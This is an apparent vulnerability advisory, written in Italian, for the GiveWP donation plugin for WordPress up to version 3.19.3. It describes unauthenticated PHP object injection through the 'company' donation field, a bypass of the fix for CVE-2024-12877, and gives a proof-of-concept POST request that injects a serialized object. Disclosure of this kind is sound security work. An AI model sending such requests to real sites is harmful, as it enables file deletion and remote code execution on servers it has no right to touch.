
GiveWP – Plugin per donazioni e piattaforma di raccolta fondi <= 3.19.3 - Iniezione di oggetti PHP non autenticata
GiveWP – Plugin per Donazioni e Piattaforma di Raccolta Fondi <= 3.19.3 - Iniezione di Oggetti PHP Non Autenticata
Il plugin GiveWP – Donation Plugin and Fundraising Platform per WordPress è vulnerabile all'Iniezione di Oggetti PHP in tutte le versioni fino alla 3.19.3 inclusa, tramite deserializzazione di input non fidati dal modulo di donazione attraverso il parametro 'company'. Ciò consente ad attaccanti non autenticati di iniettare un Oggetto PHP. La presenza aggiuntiva di una catena POP permette agli attaccanti di eliminare file arbitrari sul server, rendendo possibile l'esecuzione remota di codice. Si noti che ciò copre un bypass alla correzione per CVE-2024-12877.
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
amount=10¤cy=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=Test&[email protected]&donationType=single&donationBirthday=